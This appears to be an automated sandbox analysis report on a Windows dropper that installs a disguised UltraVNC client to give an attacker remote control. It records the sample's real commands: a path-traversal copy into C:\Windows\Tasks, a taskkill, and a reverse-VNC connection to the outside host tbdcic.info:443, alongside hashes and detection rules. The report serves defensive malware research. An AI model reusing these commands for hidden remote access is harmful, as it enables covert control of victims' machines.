Windows Analysis Report
Olz7TmvkEW.exe

Overview

General Information

Sample name: Olz7TmvkEW.exe (renamed because the original name is a hash value)
Original sample name: cc5d2ffba999e9263c55a6cf0f0d39d3264b8a0f8683bc3c4314d4faf01f2651.exe
Analysis ID: 1579877
MD5: 539b0fc32045de3013d00850827654aa
SHA1: eed973e0a66dab8e80a1403acd7beab580c34f94
SHA256: cc5d2ffba999e9263c55a6cf0f0d39d3264b8a0f8683bc3c4314d4faf01f2651
Tags: exe, tbdcic-info, user-JAMESWT_MHT

Detection

UltraVNC
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Yara detected UltraVNC Hacktool
AI detected suspicious sample
Contains VNC / remote desktop functionality (version string found)
Contains functionality to register a low level keyboard hook
Drops executables to the windows directory (C:\Windows) and starts them
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious UltraVNC Execution
Binary contains a suspicious time stamp
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Potential Command Line Path Traversal Evasion Attempt
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Process Start Locations
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

  • System is w10x64
  • Olz7TmvkEW.exe (PID: 1240 cmdline: "C:\Users\user\Desktop\Olz7TmvkEW.exe" MD5: 539B0FC32045DE3013D00850827654AA)
    • cmd.exe (PID: 4460 cmdline: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4828 cmdline: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 5482310161066753 5482310161066753.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5472 cmdline: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 5482310161066753.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 2404 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • Acrobat.exe (PID: 5628 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 7328 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 7608 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1620,i,1244757786394312861,11570424180585682022,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • timeout.exe (PID: 6408 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • taskkill.exe (PID: 7424 cmdline: taskkill /f /im sync_browser.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • timeout.exe (PID: 8012 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 7560 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 7424 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • sync_browser.exe (PID: 2044 cmdline: C:\Windows\Tasks\sync_browser.exe MD5: 749B3A68B9C5325D592822EE7C2C17EC)
      • timeout.exe (PID: 1532 cmdline: timeout /t 8 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • sync_browser.exe (PID: 1840 cmdline: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_Thj0Wf -connect tbdcic.info:443 MD5: 749B3A68B9C5325D592822EE7C2C17EC)
      • timeout.exe (PID: 2156 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 8032 cmdline: timeout /t 4 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 7428 cmdline: timeout /t 42 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 3652 cmdline: timeout /t 42 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 924 cmdline: timeout /t 42 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 6008 cmdline: timeout /t 42 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
No configs have been found

Source | Rule | Description | Author
C:\Windows\Tasks\GIjul8.QTIrrr | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrr | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security
C:\Windows\Tasks\sync_browser.exe | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security

Source | Rule | Description | Author
00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security
00000000.00000003.1299009306.0000000002904000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security
00000017.00000000.1422003832.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security
0000001A.00000002.1500421713.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security
00000000.00000003.1299366156.000000000062B000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security
(5 of 9 entries shown)

Source | Rule | Description | Author
26.0.sync_browser.exe.7ff7e5070000.0.unpack | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security
23.2.sync_browser.exe.7ff7e5070000.0.unpack | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security
26.2.sync_browser.exe.7ff7e5070000.0.unpack | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security
23.0.sync_browser.exe.7ff7e5070000.0.unpack | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: C:\Windows\Tasks\sync_browser.exe, CommandLine: C:\Windows\Tasks\sync_browser.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Tasks\sync_browser.exe, NewProcessName: C:\Windows\Tasks\sync_browser.exe, OriginalFileName: C:\Windows\Tasks\sync_browser.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 5482310161066753.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5472, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\sync_browser.exe, ProcessId: 2044, ProcessName: sync_browser.exe
Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 5472, TargetFilename: C:\Windows\Tasks\conhost.exe
Source: Process started | Author: Bhabesh Raj | Data: Command: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_Thj0Wf -connect tbdcic.info:443, CommandLine: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_Thj0Wf -connect tbdcic.info:443, CommandLine|base64offset|contains: yr, Image: C:\Windows\Tasks\sync_browser.exe, NewProcessName: C:\Windows\Tasks\sync_browser.exe, OriginalFileName: C:\Windows\Tasks\sync_browser.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 5482310161066753.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5472, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_Thj0Wf -connect tbdcic.info:443, ProcessId: 1840, ProcessName: sync_browser.exe
Source: Process started | Author: Christian Burkard (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Olz7TmvkEW.exe", ParentImage: C:\Users\user\Desktop\Olz7TmvkEW.exe, ParentProcessId: 1240, ParentProcessName: Olz7TmvkEW.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", ProcessId: 4460, ProcessName: cmd.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Olz7TmvkEW.exe", ParentImage: C:\Users\user\Desktop\Olz7TmvkEW.exe, ParentProcessId: 1240, ParentProcessName: Olz7TmvkEW.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", ProcessId: 4460, ProcessName: cmd.exe
Source: Process started | Author: juju4, Jonhnathan Ribeiro, oscd.community | Data: Command: C:\Windows\Tasks\sync_browser.exe, CommandLine: C:\Windows\Tasks\sync_browser.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Tasks\sync_browser.exe, NewProcessName: C:\Windows\Tasks\sync_browser.exe, OriginalFileName: C:\Windows\Tasks\sync_browser.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 5482310161066753.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5472, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\sync_browser.exe, ProcessId: 2044, ProcessName: sync_browser.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T13:39:02.527504+0100 | 2035893 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49918 | 194.190.152.201 | 443 | TCP

                          AV Detection

Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.4% probability
Source: Olz7TmvkEW.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: conhost.pdbUGP source: Olz7TmvkEW.exe, 00000000.00000003.1297167688.000000000273D000.00000004.00000020.00020000.00000000.sdmp, sdABZ4.E1924R.2.dr, sdABZ4.E1924R.0.dr, conhost.exe.6.dr
Source: Binary string: conhost.pdb source: Olz7TmvkEW.exe, 00000000.00000003.1297167688.000000000273D000.00000004.00000020.00020000.00000000.sdmp, sdABZ4.E1924R.2.dr, sdABZ4.E1924R.0.dr, conhost.exe.6.dr
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Code function: 0_2_00403387 GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Code function: 0_2_00402EE6 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5096DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5075910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E512A228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E509C210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5096DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5075910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E512A228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E509C210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5096DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection
Source: Network traffic | Suricata IDS: 2035893 - Severity 1 - ET MALWARE Possible Ursnif/Gamaredon Related VNC Module CnC Beacon : 192.168.2.7:49918 -> 194.190.152.201:443
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E50DD890 EnterCriticalSection,LeaveCriticalSection,recv,WSAGetLastError,WSAGetLastError,LeaveCriticalSection,recv,WSAGetLastError
Source: global traffic | DNS traffic detected: DNS query: x1.i.lencr.org
Source: global traffic | DNS traffic detected: DNS query: tbdcic.info
Source: Olz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002912000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.1299366156.0000000000639000.00000004.00001000.00020000.00000000.sdmp, GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr, GIjul8.QTIrrr.0.dr | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 77EC63BDA74BD0D0E0426DC8F80085060.12.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: Olz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002739000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000017.00000000.1422003832.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.1496636673.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.1500264641.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr, GIjul8.QTIrrr.0.dr | String found in binary or memory: http://forum.uvnc.com
Source: Olz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002739000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000017.00000000.1422003832.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.1496636673.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.1500264641.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr, GIjul8.QTIrrr.0.dr | String found in binary or memory: http://java.sun.com/products/plugin/index.html#download
Source: Olz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002739000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000017.00000000.1422003832.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.1496636673.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.1500264641.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr, GIjul8.QTIrrr.0.dr | String found in binary or memory: http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1
Source: Olz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002912000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.1299366156.0000000000639000.00000004.00001000.00020000.00000000.sdmp, GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr, GIjul8.QTIrrr.0.dr | String found in binary or memory: http://ocsp.thawte.com0
Source: Olz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002912000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.1299366156.0000000000639000.00000004.00001000.00020000.00000000.sdmp, GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr, GIjul8.QTIrrr.0.dr | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Olz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002912000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.1299366156.0000000000639000.00000004.00001000.00020000.00000000.sdmp, GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr, GIjul8.QTIrrr.0.dr | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: Olz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002912000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.1299366156.0000000000639000.00000004.00001000.00020000.00000000.sdmp, GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr, GIjul8.QTIrrr.0.dr | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Olz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002904000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.1299366156.000000000062B000.00000004.00001000.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002739000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000017.00000000.1422003832.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.1500421713.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.1496636673.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.1500264641.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr, GIjul8.QTIrrr.0.dr | String found in binary or memory: http://www.uvnc.com
Source: Olz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002739000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000017.00000000.1422003832.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.1496636673.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.1500264641.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr, GIjul8.QTIrrr.0.dr | String found in binary or memory: http://www.uvnc.comopenhttp://forum.uvnc.comnet
Source: 2D85F72862B55C4EADD9E66E06947F3D.12.dr | String found in binary or memory: http://x1.i.lencr.org/
Source: ReaderMessages.10.dr | String found in binary or memory: https://www.adobe.co
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown | Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown | Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49918
Source: unknown | Network traffic detected: HTTP traffic on port 49790 -> 443

                          Key, Mouse, Clipboard, Microphone and Screen Capturing

                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_00408630 SetWindowsHookExW 00000002,Function_00008602,00000000,000000000_2_00408630
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5071DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,23_2_00007FF7E5071DD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5071DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,23_2_00007FF7E5071DD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50A13A0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,23_2_00007FF7E50A13A0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E5071DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,26_2_00007FF7E5071DD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50A13A0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,26_2_00007FF7E50A13A0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5071AE0 OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,CloseClipboard,23_2_00007FF7E5071AE0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5073770 GetDC,CreateCompatibleDC,CreateCompatibleBitmap,GetDIBits,GetDIBits,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateDIBSection,CreateCompatibleBitmap,DeleteObject,timeGetTime,SelectObject,BitBlt,SelectObject,timeGetTime,timeGetTime,GetPixel,timeGetTime,ReleaseDC,DeleteDC,DeleteObject,23_2_00007FF7E5073770
